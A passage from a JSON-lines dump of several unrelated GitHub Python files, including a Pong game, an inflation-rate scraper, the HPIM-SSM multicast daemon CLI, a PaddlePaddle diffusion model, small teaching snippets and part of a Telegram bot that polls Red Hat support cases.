\"BLUE\": (63, 255, 255)}\n def __init__(self):\n pygame.init()\n (WIDTH, HEIGHT) = (900, 500)\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Ping' Pong\")\n self.ball = Ball(5, 5, 25, 25, 5, 5, Pong.COLORS[\"BLUE\"])\n self.board1 = Board1(WIDTH - 50, HEIGHT / 2, 10, 100, 3, Pong.COLORS[\"BLUE\"])\n self.board2 = Board2(WIDTH - 850, HEIGHT / 2, 10, 100, 3, Pong.COLORS[\"BLUE\"])\n self.score1 = 0\n self.score2 = 0\n self.flag = 0\n\n def reset_all(self):\n self.ball.x = 433\n self.ball.y = 250\n self.ball.width = 25\n self.ball.height = 25\n self.ball.vx = 5\n self.ball.vy = 5\n\n self.board1.x = 850\n self.board1.y = 200\n self.board1.vy = 0\n self.board2.x = 50\n self.board2.y = 200\n self.board2.vy = 0\n\n def endFalg(self, eFlag):\n self.endflag = eFlag\n\n def setFlag(self, nFlag):\n self.flag = nFlag\n\n def play(self): #메인실행\n clock = pygame.time.Clock()\n while True:\n clock.tick(120)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type in (pygame.KEYDOWN, pygame.KEYUP):\n self.board1.key_handler(event)\n self.board2.key_handler(event)\n if self.flag == 1:\n self.collision_handler()\n self.draw()\n if self.flag == 0:\n if self.endflag == 0:\n time.sleep(5)\n pygame.quit()\n sys.exit()\n self.reset_all()\n self.draw()\n time.sleep(1)\n self.flag = 1\n\n def winner(self):\n font = pygame.font.Font(None, 100)\n if self.score1 == 10:\n P1win = font.render(\"P1 Win!\", True, Pong.COLORS[\"BLUE\"])\n self.screen.blit(P1win, (350, 200))\n if self.score2 == 10:\n P2win = font.render(\"P2 Win!\", True, Pong.COLORS[\"BLUE\"])\n self.screen.blit(P2win, (350, 200))\n\n def collision_handler(self):\n if self.ball.rect.colliderect(self.board1.rect): #보드튕김(오른쪽)\n self.ball.vx = -self.ball.vx\n if self.ball.rect.colliderect(self.board2.rect): #보드튕김(왼쪽)\n self.ball.vx = -self.ball.vx\n\n if self.ball.x + self.ball.width >= self.screen.get_width(): #오른쪽\n self.score1 += 1\n self.flag = 0\n elif self.ball.x <= 0: #왼쪽\n self.score2 += 1\n self.flag = 0\n if self.ball.y + self.ball.height >= self.screen.get_height(): #아래\n self.ball.vy = -self.ball.vy\n elif self.ball.y <= 0: #위\n self.ball.vy = math.fabs(self.ball.vy)\n\n if self.board1.y + self.board1.height >= self.screen.get_height():\n self.board1.y = self.screen.get_height() - self.board1.height\n elif self.board1.y <= 0: #보드1 위치 제어\n self.board1.y = 0\n if self.board2.y + self.board2.height >= self.screen.get_height():\n self.board2.y = self.screen.get_height() - self.board2.height\n elif self.board2.y <= 0: #보드2 위치 제어\n self.board2.y = 0\n\n def draw(self):\n self.screen.fill(Pong.COLORS[\"BLACK\"])\n\n font = pygame.font.Font(None, 60)\n score_text1 = font.render(\"P1: \" + str(self.score1), True, Pong.COLORS[\"WHITE\"])\n score_text2 = font.render(\"P2: \" + str(self.score2), True, Pong.COLORS[\"WHITE\"])\n pygame.draw.line(self.screen, pygame.color.Color(255, 255, 255), (450, 0), (450, 500), 1)\n self.screen.blit(score_text1, (300, 0))\n self.screen.blit(score_text2, (510, 0))\n\n self.ball.update()\n self.ball.render(self.screen)\n self.board1.update()\n self.board1.render(self.screen)\n self.board2.update()\n self.board2.render(self.screen)\n\n if self.score1 == 10 or self.score2 == 10:\n self.winner()\n self.endflag = 0\n\n pygame.display.update()\n\nif __name__ == \"__main__\":\n #Pong().play()\n objPong = Pong()\n objPong.setFlag(1)\n objPong.endFalg(1)\n objPong.play()\n","repo_name":"moreek/pingpong-game","sub_path":"pingpong/pingpong.py","file_name":"pingpong.py","file_ext":"py","file_size_in_byte":6599,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"34122886212","text":"from urllib.request import urlopen,Request\r\nfrom bs4 import BeautifulSoup as soup\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom LinksAndLists import *\r\nfrom tweepy_streamer import TwitterClient\r\n\r\n\r\ndef scrape(url):\r\n uClient = urlopen(url)\r\n page = uClient.read()\r\n import codecs\r\n page_soup_html = soup(codecs.decode(page, 'utf-8'), \"html.parser\")\r\n data = page_soup_html.findAll(\"tr\", {\"class\": [\"tabledata1\", \"tabledata2\"]})\r\n return data\r\n\r\n\r\ndef frenchDateToDatetime(str):\r\n str = str.split(sep=\" \")\r\n if len(str) == 3: # Day Month Year\r\n str[0], str[1] = str[1], str[0]\r\n str[0] = month_swap_dict[str[0]]\r\n return datetime.strptime(str[0] + \" \" + str[1] + \" \" + str[2], '%b %d %Y')\r\n else:\r\n str[0] = month_swap_dict[str[0].strip('%\\xa0')]\r\n return datetime.strptime(str[0] + \" \" + str[1], '%b %Y')\r\n\r\n\r\nclass InflationContainer:\r\n def __init__(self, urlIndex):\r\n self.tag = urlIndex\r\n self.url = url_dict_inflation[urlIndex]\r\n self.data = scrape(self.url)\r\n self.Monthly = self.getMonthly()\r\n self.Yearly = self.getYearly()\r\n self.data = None\r\n\r\n def getMonthly(self):\r\n df_monthly = pd.DataFrame(columns=['Taux'])\r\n for i in range(10):\r\n element = self.data[i].findAll('td')\r\n df_monthly.loc[frenchDateToDatetime(element[0].text)] = [\r\n float(element[1].text.strip('%\\xa0').replace(',', '.'))]\r\n return df_monthly\r\n\r\n def getYearly(self):\r\n df_yearly = pd.DataFrame(columns=['Taux'])\r\n for i in range(10, 20):\r\n element = self.data[i].findAll('td')\r\n df_yearly.loc[frenchDateToDatetime(element[0].text)] = [\r\n float(element[1].text.strip('%\\xa0').replace(',', '.'))]\r\n return df_yearly\r\n\r\n def refresh(self):\r\n self.data = scrape(self.url)\r\n self.getMonthly()\r\n self.getYearly()\r\n self.data = None\r\n\r\n\r\nclass governmentRateContainer:\r\n def __init__(self):\r\n self.url = \"https://fr.global-rates.com/taux-de-interets/banques-centrales/banque-centrale-europeenne/taux-de-bce.aspx\"\r\n self.data = self.governmentRates()\r\n\r\n def governmentRates(self):\r\n data = scrape(self.url)\r\n govRates = pd.DataFrame(columns=['Titre', 'Taux', 'Date changement'])\r\n for i in range(10, 20):\r\n infos = data[i].find_all('td')\r\n govRates.loc[i - 10] = (infos[0].text, infos[2].text, infos[3].text)\r\n return govRates\r\n\r\n def checkGovernmentRateChange(self,publisher):\r\n data = self.governmentRates()\r\n truth = np.where(data['Date changement'] == self.data['Date changement'])[0]\r\n if len(truth) > 0:\r\n message = \"\"\r\n for i in truth:\r\n m = data.loc[i]\r\n message += \" \".join([\"Nouveau taux\", m['Titre'], m['Taux']]) + '\\n'\r\n self.data = data\r\n publisher.publish_tweet(message)\r\n\r\n\r\n","repo_name":"youssk541/fnstatz","sub_path":"docs/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33390372228","text":"import pickle\nimport argparse\nimport os\nimport socket\nimport sys\nimport traceback\n\nimport Main\nfrom Daemon.Daemon import Daemon\n\nVERSION = \"1.2.1.2\"\n\ndef client_socket(data_to_send):\n \"\"\"\n Send command to daemon process through a socket\n \"\"\"\n # Create a UDS socket\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n\n # Connect the socket to the port where the server is listening\n server_address = '/tmp/hpim_uds_socket'\n #print('connecting to %s' % server_address)\n try:\n print(\"in_client_socket_function\")\n sock.connect(server_address)\n sock.sendall(pickle.dumps(data_to_send))\n data_rcv = sock.recv(1024 * 256)\n if data_rcv:\n print(pickle.loads(data_rcv))\n except socket.error:\n pass\n finally:\n #print('closing socket')\n sock.close()\n\n\nclass MyDaemon(Daemon):\n def run(self):\n \"\"\"\n Daemon process will run this method until the daemon process explicitly is stopped\n \"\"\"\n Main.main()\n server_address = '/tmp/hpim_uds_socket'\n\n # Make sure the socket does not already exist\n try:\n os.unlink(server_address)\n except OSError:\n if os.path.exists(server_address):\n raise\n\n # Create a UDS socket\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n\n # Bind the socket to the port\n sock.bind(server_address)\n\n # Listen for incoming connections\n sock.listen(1)\n while True:\n try:\n connection, client_address = sock.accept()\n data = connection.recv(256 * 1024)\n print(sys.stderr, 'sending data back to the client')\n print(pickle.loads(data))\n args = pickle.loads(data)\n if 'list_interfaces' in args and args.list_interfaces:\n connection.sendall(pickle.dumps(Main.list_enabled_interfaces()))\n elif 'list_neighbors' in args and args.list_neighbors:\n connection.sendall(pickle.dumps(Main.list_neighbors()))\n elif 'list_state' in args and args.list_state:\n connection.sendall(pickle.dumps(Main.list_state()))\n elif 'list_neighbors_state' in args and args.list_neighbors_state:\n connection.sendall(pickle.dumps(Main.list_neighbors_state()))\n elif 'list_sequence_numbers' in args and args.list_sequence_numbers:\n connection.sendall(pickle.dumps(Main.list_sequence_numbers()))\n elif 'add_interface' in args and args.add_interface:\n Main.add_protocol_interface(args.add_interface[0])\n connection.shutdown(socket.SHUT_RDWR)\n elif 'hold_forwarding_state' in args and args.hold_forwarding_state:\n connection.sendall(pickle.dumps(Main.hold_forwarding_state()))\n elif 'add_interface_igmp' in args and args.add_interface_igmp:\n Main.add_igmp_interface(args.add_interface_igmp[0])\n connection.shutdown(socket.SHUT_RDWR)\n elif 'remove_interface' in args and args.remove_interface:\n Main.remove_interface(args.remove_interface[0], pim=True)\n connection.shutdown(socket.SHUT_RDWR)\n elif 'remove_interface_igmp' in args and args.remove_interface_igmp:\n Main.remove_interface(args.remove_interface_igmp[0], igmp=True)\n connection.shutdown(socket.SHUT_RDWR)\n elif 'list_hmac_algorithms' in args and args.list_hmac_algorithms:\n connection.sendall(pickle.dumps(Main.list_hash_algorithms()))\n elif 'add_interface_security' in args and args.add_interface_security:\n Main.add_security_key(args.add_interface_security[0], int(args.add_interface_security[1]),\n args.add_interface_security[2], args.add_interface_security[3])\n connection.shutdown(socket.SHUT_RDWR)\n elif 'remove_interface_security' in args and args.remove_interface_security:\n Main.remove_security_key(args.remove_interface_security[0], int(args.remove_interface_security[1]))\n connection.shutdown(socket.SHUT_RDWR)\n elif 'stop' in args and args.stop:\n Main.stop()\n connection.shutdown(socket.SHUT_RDWR)\n elif 'test' in args and args.test:\n Main.test(args.test[0], args.test[1])\n connection.shutdown(socket.SHUT_RDWR)\n # elif 'send_join' in args and args.send_join:\n # Main.send_force_join(args.send_join[0])\n # connection.shutdown(socket.SHUT_RDWR)\n # elif 'send_prune' in args and args.send_prune:\n # Main.send_force_prune(args.send_prune[0])\n # connection.shutdown(socket.SHUT_RDWR)\n except Exception:\n connection.shutdown(socket.SHUT_RDWR)\n traceback.print_exc()\n finally:\n # Clean up the connection\n connection.close()\n\n\ndef main():\n \"\"\"\n Entry point for HPIM-SSM\n \"\"\"\n parser = argparse.ArgumentParser(description='HPIM-SSM protocol', prog='hpim-ssm')\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-start\", \"--start\", action=\"store_true\", default=False,\n help=\"Start Protocol\")\n group.add_argument(\"-stop\", \"--stop\", action=\"store_true\", default=False,\n help=\"Stop Protocol\")\n group.add_argument(\"-restart\", \"--restart\", action=\"store_true\", default=False,\n help=\"Restart Protocol\")\n group.add_argument(\"-li\", \"--list_interfaces\", action=\"store_true\", default=False,\n help=\"List All Interfaces\")\n group.add_argument(\"-ln\", \"--list_neighbors\", action=\"store_true\", default=False,\n help=\"List All Neighbors\")\n group.add_argument(\"-ls\", \"--list_state\", action=\"store_true\", default=False,\n help=\"List state of IGMP and HPIM-SSM\")\n group.add_argument(\"-lns\", \"--list_neighbors_state\", action=\"store_true\", default=False,\n help=\"List Upstream and Interest state of all neighbors\")\n group.add_argument(\"-lsn\", \"--list_sequence_numbers\", action=\"store_true\", default=False,\n help=\"List Sequence Numbers\")\n group.add_argument(\"-mr\", \"--multicast_routes\", action=\"store_true\", default=False,\n help=\"List Multicast Routing table\")\n group.add_argument(\"-hfs\", \"--hold_forwarding_state\", action=\"store_true\", default=False,\n help=\"Hold forwarding state during a small amount of time after AW interface becomes AL \" +\\\n \"(prevent loss of data packets after AW replacement)\")\n group.add_argument(\"-ai\", \"--add_interface\", nargs=1, metavar='INTERFACE_NAME',\n help=\"Add HPIM-SSM interface\")\n group.add_argument(\"-aiigmp\", \"--add_interface_igmp\", nargs=1, metavar='INTERFACE_NAME',\n help=\"Add IGMP interface\")\n group.add_argument(\"-ri\", \"--remove_interface\", nargs=1, metavar='INTERFACE_NAME',\n help=\"Remove HPIM-SSM interface\")\n group.add_argument(\"-riigmp\", \"--remove_interface_igmp\", nargs=1, metavar='INTERFACE_NAME',\n help=\"Remove IGMP interface\")\n group.add_argument(\"-lsec\", \"--list_hmac_algorithms\", action=\"store_true\", default=False,\n help=\"List available HMAC Hash algorithms\")\n group.add_argument(\"-aisec\", \"--add_interface_security\", nargs=4, metavar=('INTERFACE_NAME', \"SECURITY_IDENTIFIER\",\n \"HASH_FUNCTION\", \"KEY\"),\n help=\"Add security information to interface INTERFACE_NAME. Control messages will be secured \" +\n \" with SECURITY_IDENTIFIER, HMAC algorithm based on HASH_FUNCTION and key KEY.\" +\n \" To determine available hash functions run -lsec command\")\n group.add_argument(\"-risec\", \"--remove_interface_security\", nargs=2, metavar=('INTERFACE_NAME', \"SECURITY_IDENTIFIER\"),\n help=\"Remove security information identified by SECURITY_IDENTIFIER from interface INTERFACE_NAME.\")\n group.add_argument(\"-v\", \"--verbose\", action=\"store_true\", default=False,\n help=\"Verbose (print all debug messages)\")\n group.add_argument(\"-t\", \"--test\", nargs=2, metavar=('ROUTER_NAME', 'SERVER_LOG_IP'),\n help=\"Tester... send log information to SERVER_LOG_IP. Set the router name to ROUTER_NAME\")\n group.add_argument(\"--version\", action='version', version='%(prog)s ' + VERSION)\n # group.add_argument(\"-sj\", \"--send_join\", nargs=1, metavar='INTERFACE_NAME', help=\"Send force Join\")\n # group.add_argument(\"-sp\", \"--send_prune\", nargs=1, metavar='INTERFACE_NAME', help=\"Send force Prune\")\n args = parser.parse_args()\n\n #print(parser.parse_args())\n # This script must be run as root!\n if os.geteuid() != 0:\n sys.exit('HPIM-SSM must be run as root!')\n\n daemon = MyDaemon('/tmp/Daemon-hpim.pid')\n if args.start:\n print(\"start\")\n daemon.start()\n sys.exit(0)\n elif args.stop:\n client_socket(args)\n daemon.stop()\n sys.exit(0)\n elif args.restart:\n daemon.restart()\n sys.exit(0)\n elif args.verbose:\n os.system(\"tail -f /var/log/hpimssm/stdout\")\n sys.exit(0)\n elif args.multicast_routes:\n os.system(\"ip mroute show\")\n sys.exit(0)\n elif not daemon.is_running():\n print(\"HPIM-SSM is not running\")\n parser.print_usage()\n sys.exit(0)\n\n client_socket(args)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"CatarinaGrilo/HPIM-SSM","sub_path":"hpim_ssm/Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":10076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26677157202","text":"import math\r\nimport numpy as np\r\n\r\nimport paddle\r\nimport paddle.nn as nn\r\nimport paddle.nn.functional as F\r\n\r\n\r\ndef make_beta_schedule(\r\n schedule, n_timestep, linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3\r\n):\r\n if schedule == \"linear\":\r\n betas = (\r\n paddle.linspace(\r\n linear_start ** 0.5, linear_end ** 0.5, n_timestep, dtype=np.float64\r\n )\r\n ** 2\r\n )\r\n\r\n elif schedule == \"cosine\":\r\n timesteps = (\r\n paddle.arange(n_timestep + 1, dtype=np.float64) / n_timestep + cosine_s\r\n )\r\n alphas = timesteps / (1 + cosine_s) * math.pi / 2\r\n alphas = paddle.cos(alphas).pow(2)\r\n alphas = alphas / alphas[0]\r\n betas = 1 - alphas[1:] / alphas[:-1]\r\n betas = betas.clip(max=0.999)\r\n\r\n return betas\r\n\r\n\r\ndef extract(input, t, shape):\r\n bs, = t.shape\r\n assert shape[0] == bs\r\n out = paddle.gather(input, t)\r\n assert out.shape == [bs]\r\n return paddle.reshape(out, [bs] + ((len(shape) - 1) * [1]))\r\n\r\n\r\ndef noise_like(shape, noise_fn, repeat=False):\r\n if repeat:\r\n resid = [1] * (len(shape) - 1)\r\n shape_one = (1, *shape[1:])\r\n\r\n return noise_fn(shape_one).tile([shape[0], *resid])\r\n\r\n else:\r\n return noise_fn(shape)\r\n\r\n\r\nclass GaussianDiffusion(nn.Layer):\r\n def __init__(self, betas):\r\n super().__init__()\r\n\r\n betas = betas.astype(np.float64)\r\n timesteps = betas.shape[0]\r\n self.num_timesteps = int(timesteps)\r\n\r\n alphas = 1 - betas\r\n alphas_cumprod = paddle.to_tensor(np.cumprod(alphas.numpy(), 0))\r\n alphas_cumprod_prev = paddle.concat(\r\n (paddle.to_tensor([1], dtype=np.float64), alphas_cumprod[:-1]), 0\r\n )\r\n posterior_variance = betas * (1 - alphas_cumprod_prev) / (1 - alphas_cumprod)\r\n\r\n self.register(\"betas\", betas)\r\n self.register(\"alphas_cumprod\", alphas_cumprod)\r\n self.register(\"alphas_cumprod_prev\", alphas_cumprod_prev)\r\n\r\n self.register(\"sqrt_alphas_cumprod\", paddle.sqrt(alphas_cumprod))\r\n self.register(\"sqrt_one_minus_alphas_cumprod\", paddle.sqrt(1 - alphas_cumprod))\r\n self.register(\"log_one_minus_alphas_cumprod\", paddle.log(1 - alphas_cumprod))\r\n self.register(\"sqrt_recip_alphas_cumprod\", paddle.rsqrt(alphas_cumprod))\r\n self.register(\"sqrt_recipm1_alphas_cumprod\", paddle.sqrt(1 / alphas_cumprod - 1))\r\n self.register(\"posterior_variance\", posterior_variance)\r\n self.register(\r\n \"posterior_log_variance_clipped\",\r\n paddle.log(posterior_variance.clip(min=1e-20)),\r\n )\r\n self.register(\r\n \"posterior_mean_coef1\",\r\n (betas * paddle.sqrt(alphas_cumprod_prev) / (1 - alphas_cumprod)),\r\n )\r\n self.register(\r\n \"posterior_mean_coef2\",\r\n ((1 - alphas_cumprod_prev) * paddle.sqrt(alphas) / (1 - alphas_cumprod)),\r\n )\r\n\r\n def register(self, name, tensor):\r\n self.register_buffer(name, tensor.astype(np.float32))\r\n\r\n def q_sample(self, x_0, t, noise=None):\r\n if noise is None:\r\n noise = paddle.randn_like(x_0)\r\n\r\n return (\r\n extract(self.sqrt_alphas_cumprod, t, x_0.shape) * x_0\r\n + extract(self.sqrt_one_minus_alphas_cumprod, t, x_0.shape) * noise\r\n )\r\n\r\n def p_loss(self, model, x_0, t, noise=None):\r\n if noise is None:\r\n noise = paddle.randn(x_0.shape)\r\n\r\n x_noise = self.q_sample(x_0, t, noise)\r\n x_recon = model(x_noise, t)\r\n\r\n return F.mse_loss(x_recon, noise)\r\n\r\n def predict_start_from_noise(self, x_t, t, noise):\r\n return (\r\n extract(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t\r\n - extract(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape) * noise\r\n )\r\n\r\n def q_posterior(self, x_0, x_t, t):\r\n mean = (\r\n extract(self.posterior_mean_coef1, t, x_t.shape) * x_0\r\n + extract(self.posterior_mean_coef2, t, x_t.shape) * x_t\r\n )\r\n var = extract(self.posterior_variance, t, x_t.shape)\r\n log_var_clipped = extract(self.posterior_log_variance_clipped, t, x_t.shape)\r\n\r\n return mean, var, log_var_clipped\r\n\r\n def p_mean_variance(self, model, x, t, clip_denoised):\r\n x_recon = self.predict_start_from_noise(x, t, noise=model(x, t))\r\n\r\n if clip_denoised:\r\n x_recon = x_recon.clip(min=-1, max=1)\r\n\r\n mean, var, log_var = self.q_posterior(x_recon, x, t)\r\n\r\n return mean, var, log_var\r\n\r\n def p_sample(self, model, x, t, noise_fn, clip_denoised=True, repeat_noise=False):\r\n mean, _, log_var = self.p_mean_variance(model, x, t, clip_denoised)\r\n noise = noise_like(x.shape, noise_fn, repeat_noise)\r\n shape = [x.shape[0]] + [1] * (x.ndim - 1)\r\n nonzero_mask = (1 - (t == 0).astype(np.float32)).reshape(shape)\r\n\r\n return mean + nonzero_mask * paddle.exp(0.5 * log_var) * noise\r\n\r\n @paddle.no_grad()\r\n def p_sample_loop(self, model, shape, noise_fn=paddle.randn):\r\n img = noise_fn(shape)\r\n\r\n for i in reversed(range(self.num_timesteps)):\r\n img = self.p_sample(\r\n model,\r\n img,\r\n paddle.full((shape[0],), i, dtype=np.int64),\r\n noise_fn=noise_fn,\r\n )\r\n\r\n return img\r\n","repo_name":"HighCWu/denoising-diffusion-paddle","sub_path":"diffusion.py","file_name":"diffusion.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"6407331920","text":"from collections import Counter\nimport threading,time,os,queue\n \nclass ThreadPool(object):\n def __init__(self,maxsize):\n self.maxsize = maxsize\n self._q = queue.Queue(self.maxsize)\n for i in range(self.maxsize):\n self._q.put(threading.Thread)\n \n def getThread(self):\n return self._q.get()\n \n def addThread(self):\n self._q.put(threading.Thread)\n \ndef fun(num,p):\n print('this is thread [%s]'%num)\n time.sleep(1)\n p.addThread()\n \n \nif __name__ == '__main__':\n pool = ThreadPool(2)\n for i in range(103):\n t = pool.getThread()\n a = t(target = fun,args = (i,pool))\n a.start()","repo_name":"aboutmydreams/jiaowu","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40926192028","text":"class Pets:\n name = \"pets\"\n\n @classmethod\n def about(cls):\n print(\"This class is about {0}!\".format(cls.name))\n\n\nclass Dogs(Pets):\n name = \"dogs\"\n\n\nclass Cats(Pets):\n name = \"cats\"\n\n\np = Pets()\np.about()\n\nd = Dogs()\nd.about()\n\nc = Cats()\nc.about()\n","repo_name":"serdarayalp/my-python","sub_path":"class_classmethod.py","file_name":"class_classmethod.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71544145224","text":"my_list = []\nmy_list = list()\n\nmy_list = [1, 2, 3]\nmy_list2 = [\"a\", \"b\", \"c\"]\nmy_list3 = [\"a\", 1, \"Python\", 5]\n\ncombo_list = []\none_list = [4, 5]\ncombo_list.extend(one_list)\n#print(combo_list)\n\nmy_list = [1, 2, 3]\nmy_list2 = [\"a\", \"b\", \"c\"]\ncombo_list = my_list + my_list2\n#print(combo_list)\n\nalpha_list = [34, 23, 67, 100, 88, 2]\nsorted_list = alpha_list.sort()\n#print(sorted_list)\n\n\n# Tuples are immutable like a constant list\nmy_tuple = (1, 2, 3, 4, 5)\nanother_tuple = tuple()\nabc = tuple([1, 2, 3])\nabc_list = list(abc)\n\nmy_car = {\n \"color\": \"red\",\n \"maker\": \"Toyota\",\n \"year\": 2015\n }\n\nprint(my_car[\"color\"])","repo_name":"CihatKOCAK/AI-101","sub_path":"python/part_I/lists_tuples_dictionaries.py","file_name":"lists_tuples_dictionaries.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17285963695","text":"#!/usr/bin/python3\n\"\"\"\nThis is the Red Hat Customer Portal API poller, to query for the cases\n\"\"\"\nimport sys\nimport urllib.request\nfrom pprint import pformat\nimport concurrent.futures\nimport logging\nimport time\nimport xmltodict\nimport bot\nimport config\nimport db\n\n#logging.basicConfig(\n# format='%(asctime)s %(levelname)-8s %(message)s',\n# level=logging.DEBUG,\n# datefmt='%Y-%m-%d %H:%M:%S')\n#logger = logging.getLogger(__name__)\nlogger = logging.getLogger('RedHatAPI')\nformatter = logging.Formatter(\n '%(asctime)s (%(filename)s:%(lineno)d %(threadName)s) %(levelname)s - %(name)s: \"%(message)s\"'\n)\nrhapilogger = logging.StreamHandler(sys.stderr)\nrhapilogger.setFormatter(formatter)\nlogger.addHandler(rhapilogger)\n#logger.FileHandler('tickets-pushbot.log')\n\nlogger.setLevel(logging.ERROR)\nlogger.setLevel(logging.DEBUG)\n\n\n\nclass HTTPLoginFailed(Exception):\n \"\"\"Declare the exception to be used outside of this module\"\"\"\n def __init__(self, username):\n self.username = username\n Exception.__init__(self, 'Wrong username or password exception for user %s' % username)\n\n\ndef casepoller(event):\n \"\"\"\n Main class, iterate over the database.\n Open a thread for each user configured.\n Each thread will modify the database.\n A final version of the database will be written on the disk.\n \"\"\"\n\n while True:\n try:\n logger.info(\"case poller started\")\n if event.is_set():\n logger.info(\"event received, stopping the thread\")\n break\n pollerthread = concurrent.futures.ProcessPoolExecutor()\n db.dictdb = dict(pollerthread.map(casesiterator, db.dictdb.items()))\n pollerthread.shutdown(wait=True)\n # race condition, what if we save a new user whike this function is running?\n db.savejson(config.dbfile, db.dictdb)\n logger.info(\"case poller standby for the next iteration, sleeping for \" + str(config.rhpollertimeout) + \" seconds\")\n time.sleep(config.rhpollertimeout)\n except:\n e = sys.exc_info()[0]\n logger.error(\"error: \" + e)\n\ndef casesiterator(chat_id_tuple):\n \"\"\"\n Per user thread.\n The thread will be evaluated and for every case the parsing will be started\n \"\"\"\n # the tuple must be splittted between the chat_id (user id in telegram) and the associated configuration dict\n chat_id, user_dict = chat_id_tuple\n logger.info(\"chatid: \" + chat_id + \", parsing the following database\\n\" + pformat(chat_id_tuple, depth=3))\n # verify that the user has a valid configuration\n if not db.checkuserconfiguration(chat_id, db.dictdb):\n logger.info(\"chatid: \" + chat_id + \", no valid configuration for the user\")\n else:\n # if notify index is not set, assign the default value\n if not \"notify\" in user_dict:\n user_dict[\"notify\"] = [\"Associate\"]\n # start the real parsing, checking if cases index is set\n # once a user add himself, the index is *not* set\n if \"cases\" in user_dict and user_dict[\"cases\"] is not None:\n # extract the case number and the relative hash (xml dump) associated\n for casenumber, casedump in user_dict[\"cases\"].items():\n logger.info(\"chatid: \" + chat_id + \", case \" + casenumber + \", a valid configuration has been found. The case parsing is going to be executed.\")\n # case is an hash, the key is the case number, the value is an hash.\n # the hash has None value once added, the case xml afterward\n # parsecase function will be called for every case\n user_dict[\"cases\"][casenumber] = parsecase(chat_id, casenumber, casedump, user_dict[\"credentials\"], user_dict[\"notify\"])\n else:\n logger.info(\"chatid: \" + chat_id + \", no cases hash has been found for the user\")\n\n # always return a value, which can be the original one or the modified one\n return str(chat_id), user_dict\n\n\ndef parsecase(chat_id, casenumber, storedcase, credentials, notify):\n \"\"\"\n case parser.\n The online case will be extracted and compared with the saved case.\n If there is a new comment matching the requirements, this will be sent.\n In any case return the dict to replace the current value.\n \"\"\"\n logger.debug(\"chatid: \" + chat_id + \", case \" + casenumber + \", parsing started.\")\n\n # extract the last comment dict\n onlinecase = loadcase(casenumber, credentials, notify)\n # check if there is a comment\n if onlinecase is None:\n # there are still no comments, continue\n logger.info(\"chatid: \" + chat_id + \", case \" + casenumber + \", no comment has been made in the case. Skipping further checks.\")\n return None\n # lastModifiedDate must be of the comment, not of the case. Otherwise every comment will trigger a notification.\n if storedcase is not None and 'lastcomment' in storedcase and onlinecase[\"lastcomment\"].get('lastModifiedDate') == storedcase[\"lastcomment\"].get('lastModifiedDate'):\n # if the comment retireve is the same stored, just continue to the next case\n logger.info(\"chatid: \" + chat_id + \", case \" + casenumber + \", the saved comment is the same as the latest comment in the Customer Portal\")\n return storedcase\n\n if \"text\" in onlinecase['lastcomment']:\n try:\n caseupdate = onlinecase['lastcomment'].get(\"text\")\n logger.info(caseupdate)\n logger.info(\"chatid: \" + chat_id + \", case \" + casenumber + \", sending update via telegram\")\n caseupdatestrip = (caseupdate[:1000] + '\\n[...]') if len(caseupdate) > 1000 else caseupdate\n # notify the user via telegram\n bot.pushmessage(chat_id, \"Case \" + onlinecase.get('@caseNumber') + \"\\n\" + onlinecase.get('summary') + \"\\n\" + onlinecase.get('status') + \"\\n```\\n\" + caseupdatestrip + \"\\n```\")\n logger.debug(\"chatid: \" + chat_id + \", case \" + casenumber + \", the update has been sent via telegram\")\n except Exception as e:\n logger.error(\"case \" + case + \", Exception parsing the comments, error:\\n\" + repr(e) + \"\\ncomments array:\\n\" + repr(comments) + \"\\nlastcomment parsed:\\n\" + repr(lastcomment))\n else:\n raise ValueError(\"no [lastcomment][text] for case \" + casenumber)\n #return None\n\n # return the updated case dict\n return onlinecase\n\n\ndef loadcase(case, credentials, notify):\n \"\"\"\n Load the case from Red Hat Customer Portal and parse it according to the user configuration\n \"\"\"\n # set the url for the case retrieval\n url = config.fqdn + \"/rs/cases/\" + case\n\n # request the updated online configuration\n res_body = rhquery(credentials[\"username\"], credentials[\"password\"], url)\n\n # create a dict from the XML\n case_dict = xmltodict.parse(res_body.decode('utf-8'))\n logger.debug(\"loadcase() case: \" + case + \", case_dict\\n\" + pformat(case_dict))\n\n # if [\"comments\"][\"comment\"] key does not exist, the first reply is still missing\n if case_dict['case']['comments'] is None or not \"comment\" in case_dict['case']['comments']:\n # return None to continue the parsing without this case number\n return None\n\n # extract the comments from the structure\n # the expected output is a list of OrderedDict in ['case']['comments']['comment']\n # the order is newer to older comments\n comments = case_dict['case']['comments']['comment']\n\n # if only one element is found, an OrderedDict is returned.\n # if more then one element is found, a List is returned.\n # fixing the type always to list.\n if(type(comments) is not list):\n comments = list([comments])\n\n # initialize the return value for the iteration\n lastcomment = dict()\n # create an iterator -- next is needed to get the first index\n commentsiter = iter(comments)\n\n # iterate over the retrieved dict\n try:\n while True:\n # extract the next comment from the structure\n lastcomment = next(commentsiter)\n # check if we have a real comment, on the first iteration 